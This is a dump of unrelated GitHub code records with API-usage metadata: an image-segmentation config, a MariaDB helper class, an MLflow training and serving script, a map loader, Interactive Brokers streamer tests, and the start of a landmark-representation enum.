{"api_name": "datetime.timedelta", "line_number": 77, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 80, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 81, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords.words", "line_number": 101, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords", "line_number": 101, "usage_type": "name"}, {"api_name": "nltk.corpus.stopwords.words", "line_number": 103, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords", "line_number": 103, "usage_type": "name"}, {"api_name": "nltk.FreqDist", "line_number": 105, "usage_type": "call"}, {"api_name": "operator.itemgetter", "line_number": 107, "usage_type": "call"}, {"api_name": "nltk.tag.pos_tag", "line_number": 111, "usage_type": "call"}, {"api_name": "nltk.tag", "line_number": 111, "usage_type": "attribute"}, {"api_name": "summa.keywords.keywords", "line_number": 122, "usage_type": "call"}, {"api_name": "summa.keywords", "line_number": 122, "usage_type": "name"}, {"api_name": "nltk.pos_tag", "line_number": 124, "usage_type": "call"}, {"api_name": "nltk.pos_tag", "line_number": 127, "usage_type": "call"}, {"api_name": "summa.summarizer.summarize", "line_number": 134, "usage_type": "call"}, {"api_name": "summa.keywords.keywords", "line_number": 136, "usage_type": "call"}, {"api_name": "summa.keywords", "line_number": 136, "usage_type": "name"}, {"api_name": "nltk.pos_tag", "line_number": 137, "usage_type": "call"}, {"api_name": "nltk.edit_distance", "line_number": 148, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 150, "usage_type": "call"}, {"api_name": "nltk.edit_distance", "line_number": 153, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 161, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 161, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 174, "usage_type": "call"}]}
+{"seq_id": "4377916593", "text": "from types import SimpleNamespace\nfrom muti_init import xavier_uniform_init,xavier_normal_init,he_init,kiming_init,orthogonal_init\nfrom segformer import segformer,segformer_layers\nfrom Fsegformer import Fsegformer,Fsegformer_layers\nfrom Usegformer import Usegformer,Usegformer_layers\nfrom senformer import senformer,senformer_layers\nfrom HorNet import hornet,hornet_layers\nfrom coat import coat,coat_layers\nfrom ecoat import ecoat,ecoat_layers\nfrom scoat import scoat,scoat_layers\nfrom fcoat import fcoat,fcoat_layers\nimport os\nfrom collections import defaultdict\n\n'''\n\nmuti scale\n\n\n'''\n'''\nto do...\n\n\n\nmutisampledropoutblock\n'''\n\n'''\n\"label2021\",\"-label2021\",\"--label2021\"\nth=0.55\nscore_th = 0.45\n--label\n\n'''\n\nconfig = SimpleNamespace(**{})\nconfig.folds = [0,1,2,3,4]\n# config.folds = [0,1,2,3,4]\n\nconfig.init = [xavier_uniform_init,xavier_normal_init,he_init,kiming_init,orthogonal_init]\n\nconfig.seed = 2021\nconfig.NUM_WORKERS = 16\nconfig.device_ids =[[3,2,1,0],[4,5,6,7],[0,1,2,3,4,5,6,7]][1]\nconfig.mean = [0.485, 0.456, 0.406]\nconfig.std = [0.229, 0.224, 0.225]\nconfig.img_scale = [(512,512),(768,768),(896,896),(1024,1024)]\nconfig.count ={0: defaultdict(int),1: defaultdict(int),2: defaultdict(int),3: defaultdict(int),4: defaultdict(int)}\n\nconfig.num_classes = 1\nconfig.add_extra_convs = \"on_lateral\"\nconfig.num_outs = 5\nconfig.image_size = 1024\nconfig.mit = 2\nconfig.branch_depth = 6\nconfig.nfolds = 5\n\nconfig.bs = 10\nconfig.head_epoch = 8\nconfig.full_epoch = 200\n\nconfig.head_lr_max =5e-3\nconfig.full_lr_max =slice(2.5e-4,2.5e-3)\n\n# config.model_name = f\"segformer-b{config.mit}\"\n# config.model_name = f\"Fsegformer-b{config.mit}\"\n# config.model_name = f\"hornet-b{config.mit}\"\n# config.model_name = f\"senformer-b{config.mit}\"\n# config.model_name = f\"Usegformer-b{config.mit}\"\nconfig.model_name = f\"coat\"\n# config.model_name = f\"fcoat\"\n# config.model_name = f\"ecoat\"\n# config.model_name = f\"scoat\"\nconfig.organ2label =dict(\n kidney=1,\n prostate=2,\n largeintestine=3,\n spleen=4,\n lung=5)#add\n\n\nconfig.log = \"/home/wangjingqi/hthb/log\"\nconfig.ck = '/home/wangjingqi/hthb/submit/'\nconfig.pretrain = \"/home/wangjingqi/hthb/models\"\nconfig.MASKS = [f'/home/wangjingqi/input/hubmap-organ-segmentation/{config.image_size}/{config.num_classes}/masks',\nf'/home/wangjingqi/input/hubmap-organ-segmentation/{config.image_size}/{config.num_classes}/tta_lung_masks']\n\nconfig.TRAIN = [f'/home/wangjingqi/input/hubmap-organ-segmentation/{config.image_size}/{config.num_classes}/hpa_images',\nf'/home/wangjingqi/input/hubmap-organ-segmentation/{config.image_size}/{config.num_classes}/hubmap_images']\nconfig.LABELS = \"/home/wangjingqi/input/hubmap-organ-segmentation/train.csv\"\nconfig.Data = '/home/wangjingqi/input/hubmap-organ-segmentation/train_images'\n\nconfig.models = {\n \"senformer\":[senformer,senformer_layers],\n \"segformer\":[segformer,segformer_layers],\n \"Fsegformer\":[Fsegformer,Fsegformer_layers],\n \"hornet\":[hornet,hornet_layers],\n \"Usegformer\":[Usegformer,Usegformer_layers],\n \"coat\":[coat,coat_layers],\n \"scoat\":[scoat,scoat_layers],\n \"ecoat\":[ecoat,ecoat_layers],\n \"fcoat\":[fcoat,fcoat_layers]\n\n }\n", "repo_name": "Randle-Github/Kaggle-Image-Segmentation", "sub_path": "hthb/config.py", "file_name": "config.py", "file_ext": "py", "file_size_in_byte": 3265, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": 
"32", "api": [{"api_name": "types.SimpleNamespace", "line_number": 37, "usage_type": "call"}, {"api_name": "muti_init.xavier_uniform_init", "line_number": 41, "usage_type": "name"}, {"api_name": "muti_init.xavier_normal_init", "line_number": 41, "usage_type": "name"}, {"api_name": "muti_init.he_init", "line_number": 41, "usage_type": "name"}, {"api_name": "muti_init.kiming_init", "line_number": 41, "usage_type": "name"}, {"api_name": "muti_init.orthogonal_init", "line_number": 41, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 49, "usage_type": "call"}, {"api_name": "senformer.senformer", "line_number": 95, "usage_type": "name"}, {"api_name": "senformer.senformer_layers", "line_number": 95, "usage_type": "name"}, {"api_name": "segformer.segformer", "line_number": 96, "usage_type": "name"}, {"api_name": "segformer.segformer_layers", "line_number": 96, "usage_type": "name"}, {"api_name": "Fsegformer.Fsegformer", "line_number": 97, "usage_type": "name"}, {"api_name": "Fsegformer.Fsegformer_layers", "line_number": 97, "usage_type": "name"}, {"api_name": "HorNet.hornet", "line_number": 98, "usage_type": "name"}, {"api_name": "HorNet.hornet_layers", "line_number": 98, "usage_type": "name"}, {"api_name": "Usegformer.Usegformer", "line_number": 99, "usage_type": "name"}, {"api_name": "Usegformer.Usegformer_layers", "line_number": 99, "usage_type": "name"}, {"api_name": "coat.coat", "line_number": 100, "usage_type": "name"}, {"api_name": "coat.coat_layers", "line_number": 100, "usage_type": "name"}, {"api_name": "scoat.scoat", "line_number": 101, "usage_type": "name"}, {"api_name": "scoat.scoat_layers", "line_number": 101, "usage_type": "name"}, {"api_name": "ecoat.ecoat", "line_number": 102, "usage_type": "name"}, {"api_name": "ecoat.ecoat_layers", "line_number": 102, "usage_type": "name"}, {"api_name": "fcoat.fcoat", "line_number": 103, "usage_type": "name"}, {"api_name": "fcoat.fcoat_layers", "line_number": 103, "usage_type": "name"}]}
+{"seq_id": "22106041384", "text": "#!/usr/env bin python3.8\r\nimport pymysql\r\nimport sys\r\nfrom Logger import ControllerLogger\r\n\r\nlogger = ControllerLogger()\r\n\r\n\r\nclass ControllerMariaDB(object):\r\n def __init__(self, hostname, username, password, database):\r\n self.hostname = hostname\r\n self.username = username\r\n self.password = password\r\n self.database = database\r\n\r\n def get_connection(self):\r\n try:\r\n con = pymysql.connections.Connection(user=self.username, host=self.hostname,\r\n password=self.password, database=self.database)\r\n logger.set_log_app('info', 'success connection db:{}/{}'.format(self.hostname, self.database))\r\n except pymysql.err.InternalError as err:\r\n logger.set_log_app('critical', err.args)\r\n sys.exit(1)\r\n except pymysql.err.OperationalError as err:\r\n logger.set_log_app('critical', err.args)\r\n sys.exit(1)\r\n return con\r\n\r\n def operational_sql_exec_query(self, *args):\r\n try:\r\n con = self.get_connection()\r\n cursor = con.cursor()\r\n for row_sql in args:\r\n logger.set_log_app('info', 'execute_query {}'.format(row_sql.__str__()))\r\n cursor.execute(row_sql)\r\n cursor.close()\r\n con.close()\r\n except pymysql.err.OperationalError as err:\r\n logger.set_log_app('critical', err.args)\r\n except pymysql.err.InternalError as err:\r\n logger.set_log_app('critical', err.args)\r\n except pymysql.err.ProgrammingError as err:\r\n logger.set_log_app('critical', err.args)\r\n return None\r\n\r\n #: args => tuple datasets data insert\r\n def operational_sql_insert_rows(self, sql_query, *args):\r\n try:\r\n con = self.get_connection()\r\n cursor = con.cursor()\r\n logger.set_log_app('info', 'query : {}'.format(sql_query.__str__()))\r\n cursor.executemany(sql_query, args)\r\n con.commit()\r\n cursor.close()\r\n con.close()\r\n except pymysql.err.OperationalError as err:\r\n logger.set_log_app('critical', err.args)\r\n except pymysql.err.InternalError as err:\r\n logger.set_log_app('critical', err.args)\r\n except pymysql.err.ProgrammingError as err:\r\n logger.set_log_app('critical', err.args)\r\n return None\r\n\r\n #: args => sql set variables in args\r\n def operational_sql_return_data(self, *args):\r\n try:\r\n con = self.get_connection()\r\n cursor = con.cursor()\r\n logger.set_log_app('info', 'query list: {}'.format(args.__str__()))\r\n for row_sql in args:\r\n cursor.execute(row_sql)\r\n con.commit()\r\n cursor.close()\r\n con.close()\r\n except pymysql.err.OperationalError as err:\r\n logger.set_log_app('critical', err.args)\r\n return None\r\n except pymysql.err.InternalError as err:\r\n logger.set_log_app('critical', err.args)\r\n return None\r\n except pymysql.err.ProgrammingError as err:\r\n logger.set_log_app('critical', err.args)\r\n return None\r\n data = cursor.fetchall()\r\n filter_data = [row[0] for row in data]\r\n return filter_data\r\n", "repo_name": "bryanalonso1993/aci_cisco", "sub_path": "infraestructure/Database.py", "file_name": "Database.py", "file_ext": "py", "file_size_in_byte": 3364, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "Logger.ControllerLogger", "line_number": 6, "usage_type": "call"}, {"api_name": "pymysql.connections.Connection", "line_number": 18, "usage_type": "call"}, {"api_name": "pymysql.connections", "line_number": 18, "usage_type": "attribute"}, {"api_name": "pymysql.err", "line_number": 21, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 23, "usage_type": "call"}, {"api_name": 
"pymysql.err", "line_number": 24, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 26, "usage_type": "call"}, {"api_name": "pymysql.err", "line_number": 38, "usage_type": "attribute"}, {"api_name": "pymysql.err", "line_number": 40, "usage_type": "attribute"}, {"api_name": "pymysql.err", "line_number": 42, "usage_type": "attribute"}, {"api_name": "pymysql.err", "line_number": 56, "usage_type": "attribute"}, {"api_name": "pymysql.err", "line_number": 58, "usage_type": "attribute"}, {"api_name": "pymysql.err", "line_number": 60, "usage_type": "attribute"}, {"api_name": "pymysql.err", "line_number": 75, "usage_type": "attribute"}, {"api_name": "pymysql.err", "line_number": 78, "usage_type": "attribute"}, {"api_name": "pymysql.err", "line_number": 81, "usage_type": "attribute"}]}
+{"seq_id": "7988628100", "text": "from Model.Treinamento import train\nfrom DataPrep.PreparacaoDados import load_data\nfrom Operationalization.predictions import get_predictions\nimport subprocess\nimport time\nimport mlflow\nfrom mlflow.tracking import MlflowClient\n\n\nkobe_data = load_data('./../../Data/Raw/kobe_dataset.csv')\n\n\ndef extract_relative_path(model_uri, base_path):\n return model_uri.replace(base_path, '')\n\n\ndef get_latest_lr_model_uri(experiment_name):\n base_path = \"file:///home/higoreller/Development/pos_ml_engineering/Code/Operationalization/\"\n client = MlflowClient()\n experiment = client.get_experiment_by_name(experiment_name)\n \n if experiment is None:\n raise ValueError(f\"Experiment '{experiment_name}' not found\")\n \n runs = client.search_runs(experiment_ids=[experiment.experiment_id], order_by=[\"attributes.start_time DESC\"])\n logistic_regression_model_found = False\n\n for run in runs:\n if run.info.status == \"FINISHED\":\n if not logistic_regression_model_found:\n logistic_regression_model_found = True\n else:\n model_uri = run.info.artifact_uri + \"/logistic_regression\"\n relative_model_uri = extract_relative_path(model_uri, base_path)\n return relative_model_uri\n \n raise ValueError(\"No successful model training run found\")\n\n\ndef serve_model():\n # If you need to kill process type it on terminal 'fuser -k 1234/tcp'\n subprocess.Popen([\"fuser\", \"-k\", \"1234/tcp\"])\n time.sleep(1)\n\n # Start the MLflow model server obteined from the train step\n experiment_name = \"Training\"\n model_uri = get_latest_lr_model_uri(experiment_name)\n print(model_uri)\n #model_uri = \"mlruns/796054021220512049/9f2045e593cc4fb5bd237120ec56b423/artifacts/logistic_regression\"\n subprocess.Popen([\"mlflow\", \"models\", \"serve\", \"--model-uri\", model_uri, \"--no-conda\", \"-p\", \"1234\"])\n\n try:\n # Wait for the server to start\n time.sleep(3)\n except Exception as e:\n print(f\"An error occurred: {e}\")\n\n\ndef serve_dashboard():\n subprocess.Popen(['streamlit', 'run', 'dashboard.py'])\n\n\ndef main():\n # Train\n train(kobe_data)\n\n # Start to serve the model\n serve_model()\n\n # Get predictions\n get_predictions(kobe_data, '3PT Field Goal')\n\n # Start streamlit\n serve_dashboard()\n\n\nif __name__ == '__main__':\n main()\n\n\n\n\n", "repo_name": "higoreller/microsoft_tdsp_ml_engineering", "sub_path": "Code/Operationalization/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2376, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "DataPrep.PreparacaoDados.load_data", "line_number": 10, "usage_type": "call"}, {"api_name": "mlflow.tracking.MlflowClient", "line_number": 19, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 42, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 43, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 50, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 54, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 60, "usage_type": "call"}, {"api_name": "Model.Treinamento.train", "line_number": 65, "usage_type": "call"}, {"api_name": "Operationalization.predictions.get_predictions", "line_number": 71, "usage_type": "call"}]}
+{"seq_id": "41867184988", "text": "import numpy as np\nimport pickle as pk\nfrom PIL import Image\n\ndef get_map(file_name):\n image_path = \"./src/maps/\" + file_name + \".png\"\n color_array = {}\n count = 2 \n image = Image.open(image_path)\n image = image.convert(\"RGB\")\n old_map = np.asarray(image)\n map = np.zeros((old_map.shape[0], old_map.shape[1]))\n for x in range(old_map.shape[0]):\n for y in range(old_map.shape[1]):\n if np.array_equal(old_map[x, y], np.array((0,0,0))):\n map[x,y] = 1\n #adds any other color than black or white as pitfall, can add additional colors here for different enviroments\n elif np.array_equal(old_map[x,y], np.array((255,0,0))):\n map[x,y] = -1\n elif not np.array_equal(old_map[x, y], np.array((255,255,255))):\n map_bytes = old_map[x,y].tobytes()\n if map_bytes in color_array.keys():\n map[x,y] = color_array[map_bytes]\n else:\n map[x,y] = count\n color_array[map_bytes] = count\n count +=1\n return map\n\n\n", "repo_name": "AAIR-lab/CAT-RL", "sub_path": "src/envs/map_maker.py", "file_name": "map_maker.py", "file_ext": "py", "file_size_in_byte": 1117, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "32", "api": [{"api_name": "PIL.Image.open", "line_number": 9, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 9, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.array_equal", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.array_equal", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.array_equal", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 20, "usage_type": "call"}]}
+{"seq_id": "43422825434", "text": "import time\nfrom datetime import datetime, timedelta\n\nimport pytest\nimport numpy as np\n\nfrom algotradepy.contracts import (\n StockContract,\n PriceType,\n OptionContract,\n Right,\n)\nfrom algotradepy.objects import Greeks\n\nAWAIT_TIME_OUT = 10\n\n\ndef get_streamer(client_id: int):\n pytest.importorskip(\"ib_insync\")\n from algotradepy.connectors.ib_connector import build_and_start_connector\n from algotradepy.streamers.ib_streamer import IBDataStreamer\n\n conn = build_and_start_connector(client_id=client_id)\n streamer = IBDataStreamer(ib_connector=conn)\n\n return streamer\n\n\n@pytest.fixture()\ndef streamer():\n pytest.importorskip(\"ib_insync\")\n from algotradepy.connectors.ib_connector import MASTER_CLIENT_ID\n\n streamer = get_streamer(client_id=MASTER_CLIENT_ID)\n\n yield streamer\n\n streamer.__del__()\n\n\n@pytest.mark.parametrize(\n \"bar_size\",\n [\n timedelta(seconds=5),\n timedelta(seconds=10),\n timedelta(minutes=1),\n timedelta(minutes=2),\n ],\n)\ndef test_subscribe_to_bars_data(streamer, bar_size):\n latest = None\n\n def update(bar):\n nonlocal latest\n latest = bar\n\n contract = StockContract(symbol=\"SPY\")\n streamer.subscribe_to_bars(\n contract=contract, bar_size=bar_size, func=update, rth=False,\n )\n\n streamer.sleep(bar_size.seconds + 10)\n\n assert latest is not None\n assert latest.name > datetime.now() - bar_size - timedelta(seconds=10)\n\n prev = latest.copy()\n latest = None\n streamer.sleep(bar_size.seconds)\n\n assert latest is not None\n assert latest.name > datetime.now() - bar_size\n assert latest.name > prev.name\n\n\ndef test_cancel_bars_data(streamer):\n latest = None\n\n def update(bar):\n nonlocal latest\n latest = bar\n\n contract = StockContract(symbol=\"SPY\")\n streamer.subscribe_to_bars(\n contract=contract,\n bar_size=timedelta(seconds=5),\n func=update,\n rth=False,\n )\n\n streamer.sleep(15)\n\n assert latest is not None\n assert latest.name > datetime.now() - timedelta(seconds=15)\n\n streamer.cancel_bars(contract=contract, func=update)\n last_latest = latest\n streamer.sleep(15)\n\n assert last_latest.name == latest.name\n\n\ndef test_subscribe_to_tick_data(streamer):\n con = None\n ask = None\n bid = None\n mid = None\n\n def update_ask(contract_, price_):\n nonlocal con, ask\n con = contract_\n ask = price_\n\n def update_bid(c, price_):\n nonlocal bid\n bid = price_\n\n def update_mid(c, price_):\n nonlocal mid\n mid = price_\n\n contract = StockContract(symbol=\"SPY\")\n streamer.subscribe_to_tick_data(\n contract=contract, func=update_ask, price_type=PriceType.ASK,\n )\n streamer.subscribe_to_tick_data(\n contract=contract, func=update_bid, price_type=PriceType.BID,\n )\n streamer.subscribe_to_tick_data(\n contract=contract, func=update_mid, price_type=PriceType.MARKET,\n )\n\n t0 = time.time()\n while (\n con is None\n and ask is None\n and bid is None\n and mid is None\n and time.time() - t0 <= AWAIT_TIME_OUT\n ):\n streamer.sleep()\n\n assert con == contract\n assert ask > bid\n assert mid == (ask + bid) / 2\n\n\ndef test_cancel_tick_data(streamer):\n mid = None\n\n def update_mid(c, price_):\n nonlocal mid\n mid = price_\n\n contract = StockContract(symbol=\"SPY\")\n streamer.subscribe_to_tick_data(\n contract=contract, func=update_mid, price_type=PriceType.MARKET,\n )\n\n t0 = time.time()\n while mid is None and time.time() - t0 <= AWAIT_TIME_OUT:\n streamer.sleep()\n\n assert mid is not None\n\n mid = None\n t0 = time.time()\n while mid is None and time.time() - t0 <= 
AWAIT_TIME_OUT:\n streamer.sleep()\n\n assert mid is not None # was refreshed\n\n streamer.cancel_tick_data(contract=contract, func=update_mid)\n streamer.sleep()\n mid = None\n t0 = time.time()\n while mid is None and time.time() - t0 <= AWAIT_TIME_OUT:\n streamer.sleep()\n\n assert mid is None # did not refresh again\n\n\ndef get_valid_spy_contract(idx) -> OptionContract:\n from ib_insync import IB, Stock\n\n ib = IB()\n ib.connect(clientId=idx + 1)\n ib_stk_con = Stock(symbol=\"SPY\", exchange=\"SMART\", currency=\"USD\")\n ib_details = ib.reqContractDetails(ib_stk_con)[0]\n ib.reqMarketDataType(4)\n tick = ib.reqMktData(contract=ib_stk_con, snapshot=True)\n while np.isnan(tick.ask):\n ib.sleep()\n ask = tick.ask\n ib_con_id = ib_details.contract.conId\n ib_chains = ib.reqSecDefOptParams(\n underlyingSymbol=\"SPY\",\n futFopExchange=\"\",\n underlyingSecType=\"STK\",\n underlyingConId=ib_con_id,\n )\n ib_chain = ib_chains[0]\n ib_chain.strikes.sort(key=lambda s: abs(s - ask))\n strike = ib_chain.strikes[0]\n expiration_str = ib_chain.expirations[idx]\n expiration_date = datetime.strptime(expiration_str, \"%Y%m%d\")\n spy_contract = OptionContract(\n symbol=\"SPY\",\n strike=strike,\n right=Right.CALL,\n multiplier=int(ib_chain.multiplier),\n last_trade_date=expiration_date,\n )\n ib.disconnect()\n\n return spy_contract\n\n\n@pytest.fixture()\ndef first_valid_spy_option() -> OptionContract:\n pytest.importorskip(\"ib_insync\")\n con = get_valid_spy_contract(idx=0)\n return con\n\n\n@pytest.fixture()\ndef second_valid_spy_option() -> OptionContract:\n pytest.importorskip(\"ib_insync\")\n con = get_valid_spy_contract(idx=1)\n return con\n\n\ndef test_subscribe_to_greeks(\n streamer, first_valid_spy_option, second_valid_spy_option,\n):\n first_greek_updates = []\n second_greek_updates = []\n\n def update_first_greeks(greeks: Greeks):\n first_greek_updates.append(greeks)\n\n def update_second_greeks(greeks: Greeks):\n second_greek_updates.append(greeks)\n\n streamer.subscribe_to_greeks(\n contract=first_valid_spy_option, func=update_first_greeks,\n )\n streamer.subscribe_to_greeks(\n contract=second_valid_spy_option, func=update_second_greeks,\n )\n\n while len(first_greek_updates) == 0 or len(second_greek_updates) == 0:\n streamer.sleep()\n\n assert isinstance(first_greek_updates[0], Greeks)\n assert first_greek_updates[-1] != second_greek_updates[-1]\n\n\ndef test_cancel_greeks(streamer, first_valid_spy_option):\n greek_updates = []\n\n def update_greeks(greeks: Greeks):\n greek_updates.append(greeks)\n\n streamer.subscribe_to_greeks(\n contract=first_valid_spy_option, func=update_greeks,\n )\n\n while len(greek_updates) == 0:\n streamer.sleep()\n\n streamer.cancel_greeks(\n contract=first_valid_spy_option, func=update_greeks,\n )\n\n streamer.sleep(1)\n first_len = len(greek_updates)\n streamer.sleep(5)\n\n assert len(greek_updates) == first_len\n", "repo_name": "petioptrv/automated-trading", "sub_path": "tests/streamers/test_ib_streamer.py", "file_name": "test_ib_streamer.py", "file_ext": "py", "file_size_in_byte": 6870, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "32", "api": [{"api_name": "pytest.importorskip", "line_number": 19, "usage_type": "call"}, {"api_name": "algotradepy.connectors.ib_connector.build_and_start_connector", "line_number": 23, "usage_type": "call"}, {"api_name": "algotradepy.streamers.ib_streamer.IBDataStreamer", "line_number": 24, "usage_type": "call"}, {"api_name": "pytest.importorskip", "line_number": 
31, "usage_type": "call"}, {"api_name": "algotradepy.connectors.ib_connector.MASTER_CLIENT_ID", "line_number": 34, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 29, "usage_type": "call"}, {"api_name": "algotradepy.contracts.StockContract", "line_number": 57, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 65, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 65, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 65, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 72, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 72, "usage_type": "name"}, {"api_name": "pytest.mark.parametrize", "line_number": 41, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 41, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 44, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 45, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 46, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 47, "usage_type": "call"}, {"api_name": "algotradepy.contracts.StockContract", "line_number": 83, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 86, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 94, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 94, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 94, "usage_type": "call"}, {"api_name": "algotradepy.contracts.StockContract", "line_number": 122, "usage_type": "call"}, {"api_name": "algotradepy.contracts.PriceType.ASK", "line_number": 124, "usage_type": "attribute"}, {"api_name": "algotradepy.contracts.PriceType", "line_number": 124, "usage_type": "name"}, {"api_name": "algotradepy.contracts.PriceType.BID", "line_number": 127, "usage_type": "attribute"}, {"api_name": "algotradepy.contracts.PriceType", "line_number": 127, "usage_type": "name"}, {"api_name": "algotradepy.contracts.PriceType.MARKET", "line_number": 130, "usage_type": "attribute"}, {"api_name": "algotradepy.contracts.PriceType", "line_number": 130, "usage_type": "name"}, {"api_name": "time.time", "line_number": 133, "usage_type": "call"}, {"api_name": "time.time", "line_number": 139, "usage_type": "call"}, {"api_name": "algotradepy.contracts.StockContract", "line_number": 155, "usage_type": "call"}, {"api_name": "algotradepy.contracts.PriceType.MARKET", "line_number": 157, "usage_type": "attribute"}, {"api_name": "algotradepy.contracts.PriceType", "line_number": 157, "usage_type": "name"}, {"api_name": "time.time", "line_number": 160, "usage_type": "call"}, {"api_name": "time.time", "line_number": 161, "usage_type": "call"}, {"api_name": "time.time", "line_number": 167, "usage_type": "call"}, {"api_name": "time.time", "line_number": 168, "usage_type": "call"}, {"api_name": "time.time", "line_number": 176, "usage_type": "call"}, {"api_name": "time.time", "line_number": 177, "usage_type": "call"}, {"api_name": "ib_insync.IB", "line_number": 186, "usage_type": "call"}, {"api_name": "ib_insync.Stock", "line_number": 188, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 192, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 206, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 206, "usage_type": "name"}, {"api_name": "algotradepy.contracts.OptionContract", "line_number": 207, "usage_type": "call"}, 
{"api_name": "algotradepy.contracts.Right.CALL", "line_number": 210, "usage_type": "attribute"}, {"api_name": "algotradepy.contracts.Right", "line_number": 210, "usage_type": "name"}, {"api_name": "algotradepy.contracts.OptionContract", "line_number": 183, "usage_type": "name"}, {"api_name": "pytest.importorskip", "line_number": 221, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 219, "usage_type": "call"}, {"api_name": "algotradepy.contracts.OptionContract", "line_number": 220, "usage_type": "name"}, {"api_name": "pytest.importorskip", "line_number": 228, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 226, "usage_type": "call"}, {"api_name": "algotradepy.contracts.OptionContract", "line_number": 227, "usage_type": "name"}, {"api_name": "algotradepy.objects.Greeks", "line_number": 239, "usage_type": "name"}, {"api_name": "algotradepy.objects.Greeks", "line_number": 242, "usage_type": "name"}, {"api_name": "algotradepy.objects.Greeks", "line_number": 255, "usage_type": "argument"}, {"api_name": "algotradepy.objects.Greeks", "line_number": 262, "usage_type": "name"}]}
+{"seq_id": "23650386449", "text": "\nimport numpy as np\nfrom enum import Enum\n\n\n\nclass LandmarkRepresentation:\n class Representation(Enum):\n GLOBAL_3D = 0\n GLOBAL_FULL_INVERSE_DEPTH = 1\n ANCHORED_3D = 2\n ANCHORED_FULL_INVERSE_DEPTH = 3\n ANCHORED_MSCKF_INVERSE_DEPTH = 4\n ANCHORED_INVERSE_DEPTH_SINGLE = 5\n UNKNOWN = 6\n\n @staticmethod\n def as_string(feat_representation):\n if feat_representation == LandmarkRepresentation.Representation.GLOBAL_3D:\n return \"GLOBAL_3D\"\n if feat_representation == LandmarkRepresentation.Representation.GLOBAL_FULL_INVERSE_DEPTH:\n return \"GLOBAL_FULL_INVERSE_DEPTH\"\n if feat_representation == LandmarkRepresentation.Representation.ANCHORED_3D:\n return \"ANCHORED_3D\"\n if feat_representation == LandmarkRepresentation.Representation.ANCHORED_FULL_INVERSE_DEPTH:\n return \"ANCHORED_FULL_INVERSE_DEPTH\"\n if feat_representation == LandmarkRepresentation.Representation.ANCHORED_MSCKF_INVERSE_DEPTH:\n return \"ANCHORED_MSCKF_INVERSE_DEPTH\"\n if feat_representation == LandmarkRepresentation.Representation.ANCHORED_INVERSE_DEPTH_SINGLE:\n return \"ANCHORED_INVERSE_DEPTH_SINGLE\"\n return \"UNKNOWN\"\n\n @staticmethod\n def from_string(feat_representation):\n if feat_representation == \"GLOBAL_3D\":\n return LandmarkRepresentation.Representation.GLOBAL_3D\n if feat_representation == \"GLOBAL_FULL_INVERSE_DEPTH\":\n return LandmarkRepresentation.Representation.GLOBAL_FULL_INVERSE_DEPTH\n if feat_representation == \"ANCHORED_3D\":\n return LandmarkRepresentation.Representation.ANCHORED_3D\n if feat_representation == \"ANCHORED_FULL_INVERSE_DEPTH\":\n return LandmarkRepresentation.Representation.ANCHORED_FULL_INVERSE_DEPTH\n if feat_representation == \"ANCHORED_MSCKF_INVERSE_DEPTH\":\n return LandmarkRepresentation.Representation.ANCHORED_MSCKF_INVERSE_DEPTH\n if feat_representation == \"ANCHORED_INVERSE_DEPTH_SINGLE\":\n return LandmarkRepresentation.Representation.ANCHORED_INVERSE_DEPTH_SINGLE\n return LandmarkRepresentation.Representation.UNKNOWN\n\n @staticmethod\n def is_relative_representation(feat_representation):\n return feat_representation in [\n 